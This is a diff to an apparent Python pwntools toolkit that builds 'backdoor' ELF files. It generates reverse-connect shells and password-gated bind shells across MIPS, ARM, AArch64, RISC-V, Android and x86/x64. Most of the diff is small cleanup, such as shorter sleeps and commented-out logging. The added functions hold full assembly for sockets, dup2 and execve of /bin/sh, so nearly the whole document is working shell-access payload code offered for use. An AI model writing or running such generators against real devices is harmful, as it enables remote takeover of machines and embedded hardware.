@@ -1,5 +1,6 @@
 from . import extract_shellcode
 from pwn import *
+import argparse
 
 def mipsel_backdoor(reverse_ip,reverse_port,filename=None):
 	context.arch='mips'
@@ -30,7 +31,7 @@ def mipsel_backdoor(reverse_ip,reverse_port,filename=None):
 	ELF_data=make_elf(ELF_data_shellcode)
 	if filename==None:
 		log.info("waiting 3s")
-		sleep(3)
+		sleep(1)
 		filename="mipsel_backdoor"
 		f=open(filename,"wb")
 		f.write(ELF_data)
@@ -67,7 +68,7 @@ def aarch64_backdoor(reverse_ip,reverse_port,filename=None):
 	if filename==None:
 		filename="backdoor_aarch64"
 		log.info("waiting 3s")
-		sleep(3)
+		sleep(1)
 		f=open(filename,"wb")
 		f.write(data)
 		f.close()
@@ -149,8 +150,8 @@ def aarch64_reverse_sl(reverse_ip,reverse_port):
 	shellcode_hex=extract_shellcode.extract_sl_print(shellcode,shellcode_hex)
 	shellcode_len=len(shellcode)
 	if "\\x00" in shellcode_hex:
-		log.info("waiting 3s")
-		sleep(3)
+		#log.info("waiting 3s")
+		#sleep(1)
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		log.info("the null byte in %d"%int(shellcode.index("\x00")))
 		print(shellcode_hex)
@@ -159,8 +160,8 @@ def aarch64_reverse_sl(reverse_ip,reverse_port):
 		context.endian="little"
 		return shellcode
 	else:
-		log.info("waiting 3s")
-		sleep(3)
+		#log.info("waiting 3s")
+		#sleep(1)
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
 		print(shellcode_hex)
 		context.arch='i386'
@@ -195,7 +196,7 @@ def armelv7_backdoor(reverse_ip,reverse_port,filename=None):
 	data=make_elf(all_reverseshell)
 	if filename==None:
 		log.info("waiting 3s")
-		sleep(3)
+		sleep(1)
 		filename="backdoor_armelv7"
 		f=open(filename,"wb")
 		f.write(data)
@@ -302,8 +303,8 @@ def armelv7_reverse_sl(reverse_ip,reverse_port):
 	shellcode_hex=extract_shellcode.extract_sl_print(shellcode,shellcode_hex)
 	shellcode_len=len(shellcode)
 	if "\\x00" in shellcode_hex:
-		log.info("waiting 3s")
-		sleep(3)
+		#log.info("waiting 3s")
+		#sleep(1)
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		#print shellcode.index("\x00")
 		log.info("the null byte in %d"%(int(shellcode.index(b"\x00"))))
@@ -314,8 +315,8 @@ def armelv7_reverse_sl(reverse_ip,reverse_port):
 		return shellcode
 
 	else:
-		log.info("waiting 3s")
-		sleep(3)
+		#log.info("waiting 3s")
+		#sleep(1)
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
 		print(shellcode_hex)
 		return shellcode
@@ -421,7 +422,7 @@ def armelv5_backdoor(reverse_ip,reverse_port,filename=None):
 		f.write(data)
 		f.close()
 		log.info("waiting 3s")
-		sleep(3)
+		sleep(1)
 		#print disasm(all_reverseshell)
 		log.success("backdoor_armelv5 is ok in current path ./")
 		context.arch='i386'
@@ -524,8 +525,8 @@ def armelv5_reverse_sl(reverse_ip,reverse_port):
 	shellcode_hex=extract_shellcode.extract_sl_print(shellcode,shellcode_hex)
 	shellcode_len=len(shellcode)
 	if "\\x00" in shellcode_hex:
-		log.info("waiting 3s")
-		sleep(3)
+		#log.info("waiting 3s")
+		#sleep(1)
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		log.info("the null byte in %d"%(int(shellcode.index(b"\x00"))))
 		print(shellcode_hex)
@@ -535,8 +536,8 @@ def armelv5_reverse_sl(reverse_ip,reverse_port):
 		print(shellcode_hex)
 		return shellcode
 	else:
-		log.info("waiting 3s")
-		sleep(3)
+		#log.info("waiting 3s")
+		#sleep(1)
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
 		print(shellcode_hex)
 		context.arch='i386'
@@ -546,120 +547,6 @@ def armelv5_reverse_sl(reverse_ip,reverse_port):
 		return shellcode
 
 def armebv7_reverse_sl(reverse_ip,reverse_port):
-	context.bits="32"
-	context.arch='arm'
-	context.endian='big'
-	shellcode='''
-	.ARM
-	eor r4,r4,r4
-	%s
-	strb r7,[sp,#-0x28]
-	%s
-	strb r7,[sp,#-0x27]
-	%s
-	strb r7,[sp,#-0x26]
-	%s
-	strb r7,[sp,#-0x25]
-	mov r7,#2
-	strb r7,[sp,#-0x29]
-	strb r4,[sp,#-0x2a]
-	%s
-	strb r7,[sp,#-0x2b]
-	%s
-	strb r7,[sp,#-0x2c]
-	strb r4,[sp,#-0x14]
-	mov r7,#0x68
-	strb r7,[sp,#-0x15]
-	mov r7,#0x73
-	strb r7,[sp,#-0x16]
-	mov r7,#0x2f
-	strb r7,[sp,#-0x17]
-	mov r7,#0x6e
-	strb r7,[sp,#-0x18]
-	mov r7,#0x69
-	strb r7,[sp,#-0x19]
-	mov r7,#0x62
-	strb r7,[sp,#-0x1a]
-	mov r7,#0x2f
-	strb r7,[sp,#-0x1b]
-	add r4,sp,#-0x1b
-	add r5,sp,#-0x2c
-	add r3,pc,#1
-	bx  r3
-	.THUMB
-	mov r1,#2
-	mov r0,r1
-	mov r1,#1
-	eor r2,r2,r2
-	mov r7,#200
-	add r7,r7,#81
-	svc #1
-	mov r6,r0
-	mov r1,r5
-	mov r2,#0x10
-	add r7,r7,#2
-	svc #1
-	mov r0,r6
-	eor r1,r1,r1
-	mov r7,#63
-	svc #1
-	mov r0,r6
-	add r1,r1,#1
-	svc #1
-	mov r0,r6
-	add r1,r1,#1
-	svc #1
-	mov r0,r4
-	eor r1,r1,r1
-	eor r2,r2,r2
-	push {r0,r1}
-	mov r1,sp
-	mov r7,#0xb
-	svc #1
-	'''
-	log.success("reverse_ip is set to "+ reverse_ip)
-	log.success("reverse_port is set to "+ strreverse_port)
-	handle_ip=reverse_ip.split('.')[::-1]
-	handle_port=list(str(reverse_port))
-	for i in range(len(handle_ip)):
-		if handle_ip[i]!="0":
-			handle_ip[i]="mov r7,#"+handle_ip[i]
-		else:
-			handle_ip[i]="eor r7,r7,r7"
-	for i in range(len(handle_port)):
-		if handle_port[i]!="\x00":
-			handle_port[i]="mov r7,#"+str(handle_port[i])
-		else:
-			handle_port[i]="eor r7,r7,r7"
-
-	shellcode=shellcode%(handle_ip[0],handle_ip[1],handle_ip[2],handle_ip[3],handle_port[0],handle_port[1])
-	#print shellcode
-	#str(u8(handle_port[0])),str(u8(handle_port[1])
-	#handle_ip[0],handle_ip[1],handle_ip[2],handle_ip[3]
-	shellcode=asm(shellcode)[:-2]
-	shellcode_hex=''
-	shellcode_hex=extract_shellcode.extract_sl_print(shellcode,shellcode_hex)
-	shellcode_len=len(shellcode)
-	if "\\x00" in shellcode_hex:
-		sleep(3)
-		log.info("waiting 3s")
-		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
-		log.success("the null byte in %d"%int(shellcode.index("\x00")))
-		print(shellcode_hex)
-		context.arch='i386'
-		context.bits="32"
-		context.endian="little"
-		#return shellcode
-	else:
-		log.info("waiting 3s")
-		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
-		print(shellcode_hex)
-		context.arch='i386'
-		context.bits="32"
-		context.endian="little"
-		return shellcode
-
-def armebv5_reverse_sl(reverse_ip,reverse_port):
 	context.bits="32"
 	context.arch='arm'
 	context.endian='big'
@@ -755,16 +642,131 @@ def armebv5_reverse_sl(reverse_ip,reverse_port):
 	shellcode_hex=extract_shellcode.extract_sl_print(shellcode,shellcode_hex)
 	shellcode_len=len(shellcode)
 	if "\\x00" in shellcode_hex:
-		log.info("waiting 3s")
+		#sleep(1)
+		#log.info("waiting 3s")
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
-		log.info("the null byte in %d"%int(shellcode.index("\x00")))
+		log.success("the null byte in %d"%int(shellcode.index(b"\x00")))
+		print(shellcode_hex)
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
+		#return shellcode
+	else:
+		#log.info("waiting 3s")
+		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
+		print(shellcode_hex)
+		context.arch='i386'
+		context.bits="32"
+		context.endian="little"
+		return shellcode
+
+def armebv5_reverse_sl(reverse_ip,reverse_port):
+	context.bits="32"
+	context.arch='arm'
+	context.endian='big'
+	shellcode='''
+	.ARM
+	eor r4,r4,r4
+	%s
+	strb r7,[sp,#-0x28]
+	%s
+	strb r7,[sp,#-0x27]
+	%s
+	strb r7,[sp,#-0x26]
+	%s
+	strb r7,[sp,#-0x25]
+	mov r7,#2
+	strb r7,[sp,#-0x29]
+	strb r4,[sp,#-0x2a]
+	%s
+	strb r7,[sp,#-0x2b]
+	%s
+	strb r7,[sp,#-0x2c]
+	strb r4,[sp,#-0x14]
+	mov r7,#0x68
+	strb r7,[sp,#-0x15]
+	mov r7,#0x73
+	strb r7,[sp,#-0x16]
+	mov r7,#0x2f
+	strb r7,[sp,#-0x17]
+	mov r7,#0x6e
+	strb r7,[sp,#-0x18]
+	mov r7,#0x69
+	strb r7,[sp,#-0x19]
+	mov r7,#0x62
+	strb r7,[sp,#-0x1a]
+	mov r7,#0x2f
+	strb r7,[sp,#-0x1b]
+	add r4,sp,#-0x1b
+	add r5,sp,#-0x2c
+	add r3,pc,#1
+	bx  r3
+	.THUMB
+	mov r1,#2
+	mov r0,r1
+	mov r1,#1
+	eor r2,r2,r2
+	mov r7,#200
+	add r7,r7,#81
+	svc #1
+	mov r6,r0
+	mov r1,r5
+	mov r2,#0x10
+	add r7,r7,#2
+	svc #1
+	mov r0,r6
+	eor r1,r1,r1
+	mov r7,#63
+	svc #1
+	mov r0,r6
+	add r1,r1,#1
+	svc #1
+	mov r0,r6
+	add r1,r1,#1
+	svc #1
+	mov r0,r4
+	eor r1,r1,r1
+	eor r2,r2,r2
+	push {r0,r1}
+	mov r1,sp
+	mov r7,#0xb
+	svc #1
+	'''
+	log.success("reverse_ip is set to "+ reverse_ip)
+	log.success("reverse_port is set to "+ str(reverse_port))
+
+	handle_ip=reverse_ip.split('.')[::-1]
+	handle_port=list(str(reverse_port))
+	for i in range(len(handle_ip)):
+		if handle_ip[i]!="0":
+			handle_ip[i]="mov r7,#"+handle_ip[i]
+		else:
+			handle_ip[i]="eor r7,r7,r7"
+	for i in range(len(handle_port)):
+		if handle_port[i]!="\x00":
+			handle_port[i]="mov r7,#"+str(handle_port[i])
+		else:
+			handle_port[i]="eor r7,r7,r7"
+
+	shellcode=shellcode%(handle_ip[0],handle_ip[1],handle_ip[2],handle_ip[3],handle_port[0],handle_port[1])
+	#print shellcode
+	#str(u8(handle_port[0])),str(u8(handle_port[1])
+	#handle_ip[0],handle_ip[1],handle_ip[2],handle_ip[3]
+	shellcode=asm(shellcode)[:-2]
+	shellcode_hex=''
+	shellcode_hex=extract_shellcode.extract_sl_print(shellcode,shellcode_hex)
+	shellcode_len=len(shellcode)
+	if "\\x00" in shellcode_hex:
+		#log.info("waiting 3s")
+		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
+		log.info("the null byte in %d"%int(shellcode.index(b"\x00")))
 		print(shellcode_hex)
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
 		return shellcode
 	else:
-		log.info("waiting 3s")
+		#log.info("waiting 3s")
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
 		print(shellcode_hex)
 		context.arch='i386'
@@ -797,14 +799,14 @@ def armebv7_backdoor(reverse_ip,reverse_port,filename=None):
 	all_reverseshell=basic_shellcode+shellcode2+shellcode3
 	data=make_elf(all_reverseshell)
 	log.info("waiting 3s")
-	sleep(3)
+	sleep(1)
 	if filename==None:
 		filename="backdoor_armv7"
 		f=open(filename,"wb")
 		f.write(data)
 		f.close()
 		#print disasm(all_reverseshell)
-		log.success("backdoor_armv7 is ok in current path ./")
+		log.success("backdoor_armebv7 is ok in current path ./")
 		context.arch='i386'
 		context.bits="32"
 		context.endian="little"
@@ -867,7 +869,7 @@ def mipsel_backdoor(reverse_ip,reverse_port,filename=None):
 	ELF_data_shellcode=shellcode_connect+shellcode_dump_sh+shellcode_execve
 	ELF_data=make_elf(ELF_data_shellcode)
 	log.info("waiting 3s")
-	sleep(3)
+	sleep(1)
 	if filename==None:
 		filename="mipsel_backdoor"
 		f=open(filename,"wb")
@@ -903,7 +905,7 @@ def mips_backdoor(reverse_ip,reverse_port,filename=None):
 	ELF_data_shellcode=shellcode_connect+shellcode_dump_sh+shellcode_execve
 	ELF_data=make_elf(ELF_data_shellcode)
 	log.info("waiting 3s")
-	sleep(3)
+	sleep(1)
 	if filename==None:
 		filename="mips_backdoor"
 		f=open(filename,"wb")
@@ -943,8 +945,8 @@ def mipsel_reverse_sl(reverse_ip,reverse_port):
 	shellcode_hex=''
 	shellcode_hex=extract_shellcode.extract_sl_print(data_shellcode,shellcode_hex)
 	if "\\x00" in shellcode_hex:
-		log.info("waiting 3s")
-		sleep(3)
+		#log.info("waiting 3s")
+		#sleep(1)
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		log.info("the null byte in %d"%(int(data_shellcode.index(b"\x00"))))
 		print(shellcode_hex)
@@ -953,8 +955,8 @@ def mipsel_reverse_sl(reverse_ip,reverse_port):
 		context.endian="little"
 		return data_shellcode
 	else:
-		log.info("waiting 3s")
-		sleep(3)
+		#log.info("waiting 3s")
+		#sleep(1)
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
 		print(shellcode_hex)
 		context.arch='i386'
@@ -990,8 +992,8 @@ def mips_reverse_sl(reverse_ip,reverse_port):
 	shellcode_hex=''
 	shellcode_hex=extract_shellcode.extract_sl_print(data_shellcode,shellcode_hex)
 	if "\\x00" in shellcode_hex:
-		log.info("waiting 3s")
-		sleep(3)
+		#log.info("waiting 3s")
+		#sleep(1)
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		log.info("the null byte in %d"%(int(data_shellcode.index(b"\x00"))))
 		print(shellcode_hex)
@@ -1000,8 +1002,8 @@ def mips_reverse_sl(reverse_ip,reverse_port):
 		context.endian="little"
 		return data_shellcode
 	else:
-		log.info("waiting 3s")
-		sleep(3)
+		#log.info("waiting 3s")
+		#sleep(1)
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
 		print(shellcode_hex)
 		context.arch='i386'
@@ -1112,7 +1114,7 @@ def mips64el_backdoor(reverse_ip,reverse_port,filename=None):
 
 	'''
 	log.info("waiting 3s")
-	sleep(3)
+	sleep(1)
 	shellcode=asm(shellcode_connect)+asm(shellcode_dup_sh)+asm(shellcode_execve)
 	shellcode=make_elf(shellcode)
 	if(filename==None):
@@ -1218,7 +1220,7 @@ def mips64_backdoor(reverse_ip,reverse_port,filename=None):
 	shellcode = asm(shellcode_connect) + asm(shellcode_dup_sh) + asm(shellcode_execve)
 	shellcode = make_elf(shellcode)
 	log.info("waiting 3s")
-	sleep(3)
+	sleep(1)
 	if (filename == None):
 		f = open("./mips64_backdoor", "wb")
 		f.write(shellcode)
@@ -1322,8 +1324,8 @@ def mips64el_reverse_sl(reverse_ip,reverse_port):
 	shellcode_hex = ''
 	shellcode_hex = extract_shellcode.extract_sl_print(data_shellcode, shellcode_hex)
 	if "\\x00" in shellcode_hex:
-		log.info("waiting 3s")
-		sleep(3)
+		#log.info("waiting 3s")
+		#sleep(1)
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		log.info("the null byte in {}".format(data_shellcode.index(b"\x00")))
 		print(shellcode_hex)
@@ -1332,8 +1334,8 @@ def mips64el_reverse_sl(reverse_ip,reverse_port):
 		context.endian = "little"
 		return data_shellcode
 	else:
-		log.info("waiting 3s")
-		sleep(3)
+		#log.info("waiting 3s")
+		#sleep(1)
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
 		print(shellcode_hex)
 		context.arch = 'i386'
@@ -1434,8 +1436,8 @@ def mips64_reverse_sl(reverse_ip,reverse_port):
 	shellcode_hex = ''
 	shellcode_hex = extract_shellcode.extract_sl_print(data_shellcode, shellcode_hex)
 	if "\\x00" in shellcode_hex:
-		log.info("waiting 3s")
-		sleep(3)
+		#log.info("waiting 3s")
+		#sleep(1)
 		log.info("pay attaction NULL byte in shellcode(len is {})".format(shellcode_len))
 		log.info("the null byte in {}".format(data_shellcode.index(b"\x00")))
 		print(shellcode_hex)
@@ -1444,8 +1446,8 @@ def mips64_reverse_sl(reverse_ip,reverse_port):
 		context.endian = "little"
 		return data_shellcode
 	else:
-		log.info("waiting 3s")
-		sleep(3)
+		#log.info("waiting 3s")
+		#sleep(1)
 		log.success("No NULL byte shellcode for hex(len is {}):".format(shellcode_len))
 		print(shellcode_hex)
 		context.arch = 'i386'
@@ -1515,7 +1517,7 @@ def riscv64el_backdoor(reverse_ip,reverse_port,filename=None):
 	shellcode = shellcode_connect+shellcode_dup_sh+shellcode_execve
 	shellcode=make_elf(shellcode)
 	log.info("waiting 3s")
-	sleep(3)
+	sleep(1)
 	if(filename==None):
 		f=open("./riscv64el_backdoor","wb")
 		f.write(shellcode)
@@ -1551,7 +1553,7 @@ def android_aarch64_backdoor(reverse_ip,reverse_port,filename=None):
 	#all_reverseshell=shellcode3
 	data=make_elf(all_reverseshell)
 	log.info("waiting 3s")
-	sleep(3)
+	sleep(1)
 	if filename==None:
 		filename="backdoor_Android_aarch64"
 		f=open(filename,"wb")
@@ -1668,7 +1670,7 @@ def x64_bind_shell(listen_port, passwd, filename=None):
 	shellcode = asm(shellcode%(listen_port, passwd_len, passwd))
 	data=make_elf(shellcode)
 	log.info("waiting 3s")
-	sleep(3)
+	sleep(1)
 	if(filename==None):
 		f=open("./x64_bind_shell","wb")
 		f.write(data)
@@ -1695,7 +1697,6 @@ def x86_bind_shell(listen_port, passwd, filename=None):
 	listen_port = '0x'+enhex(p16(listen_port))
 	passwd_len = hex(len(passwd))
 	passwd = "0x"+enhex(p32(int("0x"+enhex(passwd.encode()),16)).replace(b"\x00",b'')).rjust(16,"0")
-	print(passwd)
 	shellcode = '''
 	push 0x1
 	pop ebx
@@ -1785,7 +1786,7 @@ def x86_bind_shell(listen_port, passwd, filename=None):
 	shellcode = asm(shellcode%(listen_port, passwd_len, passwd))
 	data = make_elf(shellcode)
 	log.info("waiting 3s")
-	sleep(3)
+	sleep(1)
 	if(filename==None):
 		f=open("./x86_bind_shell","wb")
 		f.write(data)
@@ -1800,6 +1801,8 @@ def x86_bind_shell(listen_port, passwd, filename=None):
 Armv7 bindshell backdoor file
 
 2022.10.26 updating more appear
+
+fish 2022.10.27 powered by doudou
 '''
 def armelv7_bind_shell(listen_port, passwd, filename=None):
 	context.arch = 'arm'
@@ -1810,7 +1813,6 @@ def armelv7_bind_shell(listen_port, passwd, filename=None):
 	listen_port = '0x'+enhex(p16(listen_port))
 	passwd_len = hex(len(passwd))
 	passwd = "0x"+enhex(p32(int("0x"+enhex(passwd.encode()),16)).replace(b"\x00",b'')).rjust(8,"0")
-	#print(passwd)
 	passwd_high = passwd[:6]
 	passwd_low  = "0x"+passwd[6:10]
 	shellcode = shellcraft.socket(2,1,0)
@@ -1871,10 +1873,10 @@ def armelv7_bind_shell(listen_port, passwd, filename=None):
 	cmp r1,#0
 	'''
 	shellcode += asm(shellcode_dump) + b"\xF9\xFF\xFF\xaa"
-	shellcode += asm(shellcraft.sh())
+	shellcode += asm(shellcraft.execve("/bin/sh",["/bin/sh"],0))
 	data = make_elf(shellcode)
 	log.info("waiting 3s")
-	sleep(3)
+	sleep(1)
 	if(filename==None):
 		f=open("./armelv7_bind_shell","wb")
 		f.write(data)
@@ -1884,5 +1886,551 @@ def armelv7_bind_shell(listen_port, passwd, filename=None):
 	context.bits = "32"
 	context.endian = "little"
 
+'''
+Armv7eb bindshell backdoor file
+
+date : 2022.10.28 
+'''
+
+def armv7eb_bind_shell(listen_port, passwd, filename = None):
+	context.arch = 'arm'
+	context.endian = 'big'
+	context.bits = '32'
+	log.success("bind port is set to "+ str(listen_port))
+	log.success("passwd is set to '%s'"%passwd )
+	listen_port = '0x'+enhex(p16(listen_port))
+	passwd_len = hex(len(passwd))
+	passwd = "0x"+enhex(p32(int("0x"+enhex(passwd.encode()),16)).replace(b"\x00",b'')).ljust(8,"0")
+	passwd_high = passwd[:6]
+	passwd_low  = "0x"+passwd[6:10]
+	shellcode = shellcraft.socket(2,1,0)
+	shellcode += '''
+	mov  r6, r0
+	movw r7, #%s
+	movt r7, #2
+	push {r2}
+	push {r7}
+	mov  r1,sp
+	mov  r2,#0x10  
+	movw r7, 0x11a
+	svc #0
+	mov r0,r6
+	eor r1,r1
+	movw r7,#284
+	svc #0
+	mov r0,r6
+	eor r2,r2
+	movw r7, 0x11d
+    svc #0
+    mov r6,r0
+	movw r7, #0x414141 & 0xffff
+	movt r7, #0x414141 >> 16
+	push {r7}
+	movw r7, #0x77643a20 & 0xffff
+	movt r7, #0x77643a20 >> 16
+	push {r7}
+	movw r7, #0x50617373 & 0xffff
+	movt r7, #0x50617373 >> 16
+	push {r7}
+	mov  r1, sp
+	mov  r2, #8
+	/* call write() */
+	mov  r7, #SYS_write /* 4 */
+	svc  0
+	sub  sp, 0x20
+	mov  r0, r6
+	mov  r1, sp
+	mov  r2, #%s
+	mov  r7, #3
+	svc  #0
+	mov  r7,sp
+	ldr  r7,[r7]
+	movw r5,#%s
+	movt r5,#%s
+	cmp  r7,r5
+	'''
+	shellcode = asm(shellcode % (listen_port, passwd_len ,passwd_low ,passwd_high))
+	shellcode += b"\x80\x00\x00\x1a"[::-1]
+	shellcode_dump = '''
+	mov r1,#2
+	mov r0,r6
+	mov r7,#63
+	svc #0
+	sub r1, r1, #1
+	cmp r1,#0
+	'''
+	shellcode += asm(shellcode_dump) + b"\xF9\xFF\xFF\xaa"[::-1]
+	shellcode += asm(shellcraft.execve("/bin/sh",["/bin/sh"],0))
+	data = make_elf(shellcode)
+	log.info("waiting 3s")
+	sleep(1)
+	if(filename==None):
+		f=open("./armelv7_bind_shell","wb")
+		f.write(data)
+		f.close()
+		log.success("armebv7_bind_shell is ok in current path ./")
+	context.arch = 'i386'
+	context.bits = "32"
+	context.endian = "little"
 
 
+'''
+x86 x64el_backdoor
+2022.10.31 add
+'''
+def x64el_backdoor(reverse_ip, reverse_port, filename=None):
+	context.arch = 'amd64'
+	context.endian = 'little'
+	context.bits = '64'
+	log.success("reverse_ip is: "+ reverse_ip)
+	log.success("reverse_port is: "+str(reverse_port))
+	shellcode = shellcraft.connect(reverse_ip, reverse_port)
+	shellcode += shellcraft.dup2('rbp',0)+shellcraft.dup2('rbp',1)+ shellcraft.dup2("rbp",2)
+	shellcode += shellcraft.sh()
+	shellcode = asm(shellcode)
+	data = make_elf(shellcode)
+	log.info("waiting 3s")
+	sleep(1)
+	if(filename==None):
+		f=open("./x64el_backdoor","wb")
+		f.write(data)
+		f.close()
+		log.success("x64el_backdoor is ok in current path ./")
+		context.arch = 'i386'
+		context.bits = "32"
+		context.endian = "little"
+
+'''
+x86 x86el_backdoor
+2022.10.31 add
+'''
+def x86el_backdoor(reverse_ip, reverse_port, filename =None):
+	context.arch = 'i386'
+	context.bits = "32"
+	context.endian = "little"
+	log.success("reverse_ip is: "+ reverse_ip)
+	log.success("reverse_port is: "+str(reverse_port))
+	shellcode = shellcraft.connect(reverse_ip, reverse_port)
+	shellcode += shellcraft.dup2('edx',0)+shellcraft.dup2('edx',1)+ shellcraft.dup2("edx",2)
+	shellcode += shellcraft.sh()
+	shellcode = asm(shellcode)
+	data = make_elf(shellcode)
+	log.info("waiting 3s")
+	sleep(1)
+	if(filename==None):
+		f=open("./x86el_backdoor","wb")
+		f.write(data)
+		f.close()
+		log.success("x86el_backdoor is ok in current path ./")
+
+
+
+'''
+mipsel bindshell backdoor
+
+2022.10.31
+'''
+def mipsel_bind_shell(listen_port, passwd,filename = None):
+	context.arch = 'mips'
+	context.endian = 'little'
+	context.bits = '32'
+	log.success("bind port is set to "+ str(listen_port))
+	log.success("passwd is set to '%s'"%passwd )
+	listen_port = '0x'+enhex(p16(listen_port))
+	passwd_len = hex(len(passwd))
+	passwd = "0x"+enhex(p32(int("0x"+enhex(passwd.encode()),16)).replace(b"\x00",b'')).rjust(8,"0")
+	#passwd_high = passwd[:6]
+	#passwd_low  = "0x"+passwd[6:10]
+	shellcode = shellcraft.socket(2,2,0)
+	shellcode +='''
+	addiu  $sp,$sp,-32
+	li $t7,0x7350
+	andi   $s0, $v0, 0xffff
+	addiu  $t6, $zero, -0x11
+	not    $t6, $t6
+	addiu  $t5, $zero, %s
+	sllv   $t5, $t5, $t6
+	addiu  $t6, $zero, -0x3
+	not    $t6, $t6
+	or     $t5, $t5, $t6
+	sw     $t5, -0x20($sp)
+	sw     $zero, -0x1c($sp)
+	sw     $zero, -0x18($sp)
+	sw     $zero, -0x14($sp)
+	or     $a0, $s0, $s0
+	addiu  $t6, $zero, -0x11
+	not    $a2, $t6
+	addi   $a1, $sp, -0x20
+	addiu  $v0, $zero, 0x1049
+	syscall 0x40404
+	addiu  $t7, $zero, 0x7350
+	or     $a0, $s0, $s0
+	addiu  $a1, $zero, 0x101
+	addiu  $v0, $zero, 0x104e
+	syscall 0x40404
+	addiu  $t7, $zero, 0x7350
+	or     $a0, $s0, $s0
+	slti   $a1, $zero, -1
+	slti   $a2, $zero, -1
+	addiu  $v0, $zero, 0x1048
+	syscall 0x40404
+	addiu  $t7, $zero, 0x7350
+	andi   $s0, $v0, 0xffff
+	or     $a0, $s0, $s0
+	addiu  $t7, $zero, -3
+	not    $a1, $t7
+	addiu  $v0, $zero, 0xfdf
+	syscall 0x40404
+	addiu  $t7, $zero, 0x7350
+	or     $a0, $s0, $s0
+	slti   $a1, $zero, 0x101
+	addiu  $v0, $zero, 0xfdf
+	syscall 0x40404
+	addiu  $t7, $zero, 0x7350
+	or     $a0, $s0, $s0
+	slti   $a1, $zero, -1
+	addiu  $v0, $zero, 0xfdf
+	syscall 0x40404
+	'''
+	#print(passwd)
+	shellcode = shellcode%(listen_port)
+	shellcode = asm(shellcode)
+	shellcode += asm(shellcraft.write("$s0","Passwd: ",8))
+	shellcode += asm("addiu  $sp, $sp, -0x40")
+	shellcode += asm(shellcraft.read("$s0","$sp",passwd_len))
+	shellcode += asm("li $s1, %s\nlw $s3, ($sp)"%(passwd))+b"\x18\x20\x71\x16"
+	shellcode += asm(shellcraft.execve("/bin/sh",["/bin/sh"],0))
+	#shellcode = asm(shellcode)
+	data = make_elf(shellcode)
+	log.info("waiting 3s")
+	sleep(1)
+	if(filename==None):
+		f=open("./mipsel_bind_shell","wb")
+		f.write(data)
+		f.close()
+		log.success("mipsel_bind_shell is ok in current path ./")
+	context.arch = 'i386'
+	context.bits = "32"
+	context.endian = "little"
+
+'''
+mips bindshell
+
+add 2022.11.1 
+'''
+def mips_bind_shell(listen_port, passwd, filename=None ):
+	context.arch = 'mips'
+	context.endian = 'big'
+	context.bits = '32'
+	log.success("bind port is set to "+ str(listen_port))
+	log.success("passwd is set to '%s'"%passwd )
+	listen_port = '0x'+enhex(p16(listen_port))
+	passwd_len = hex(len(passwd))
+	passwd = "0x"+enhex(p32(int("0x"+enhex(passwd.encode()),16)).replace(b"\x00",b'')).rjust(8,"0")
+	#passwd_high = passwd[:6]
+	#passwd_low  = "0x"+passwd[6:10]
+	shellcode = shellcraft.socket(2,2,0)
+	shellcode +='''
+	addiu  $sp,$sp,-32
+	li $t7,0x7350
+	andi   $s0, $v0, 0xffff
+	addiu  $t6, $zero, -0x11
+	not    $t6, $t6
+	addiu  $t5, $zero, 0x2
+	sllv   $t5, $t5, $t6
+	addiu  $s4, $zero, %s
+	or     $t5, $t5, $s4
+	sw     $t5, -0x20($sp)
+	sw     $zero, -0x1c($sp)
+	sw     $zero, -0x18($sp)
+	sw     $zero, -0x14($sp)
+	or     $a0, $s0, $s0
+	addiu  $t6, $zero, -0x11
+	not    $a2, $t6
+	addi   $a1, $sp, -0x20
+	addiu  $v0, $zero, 0x1049
+	syscall 0x40404
+	addiu  $t7, $zero, 0x7350
+	or     $a0, $s0, $s0
+	addiu  $a1, $zero, 0x101
+	addiu  $v0, $zero, 0x104e
+	syscall 0x40404
+	addiu  $t7, $zero, 0x7350
+	or     $a0, $s0, $s0
+	slti   $a1, $zero, -1
+	slti   $a2, $zero, -1
+	addiu  $v0, $zero, 0x1048
+	syscall 0x40404
+	addiu  $t7, $zero, 0x7350
+	andi   $s0, $v0, 0xffff
+	or     $a0, $s0, $s0
+	addiu  $t7, $zero, -3
+	not    $a1, $t7
+	addiu  $v0, $zero, 0xfdf
+	syscall 0x40404
+	addiu  $t7, $zero, 0x7350
+	or     $a0, $s0, $s0
+	slti   $a1, $zero, 0x101
+	addiu  $v0, $zero, 0xfdf
+	syscall 0x40404
+	addiu  $t7, $zero, 0x7350
+	or     $a0, $s0, $s0
+	slti   $a1, $zero, -1
+	addiu  $v0, $zero, 0xfdf
+	syscall 0x40404
+	'''
+	#print(passwd)
+	shellcode = shellcode%(listen_port)
+	shellcode = asm(shellcode)
+	shellcode += asm(shellcraft.write("$s0","Passwd: ",8))
+	shellcode += asm("addiu  $sp, $sp, -0x40")
+	shellcode += asm(shellcraft.read("$s0","$sp",passwd_len))
+	shellcode += asm("li $s3, %s\nlw $s1, ($sp)"%(passwd))+b"\x18\x20\x71\x16"[::-1]
+	shellcode += asm(shellcraft.execve("/bin/sh",["/bin/sh"],0))
+	#shellcode = asm(shellcode)
+	data = make_elf(shellcode)
+	log.info("waiting 3s")
+	sleep(1)
+	if(filename==None):
+		f=open("./mips_bind_shell","wb")
+		f.write(data)
+		f.close()
+		log.success("mips_bind_shell is ok in current path ./")
+	context.arch = 'i386'
+	context.bits = "32"
+	context.endian = "little"
+
+'''
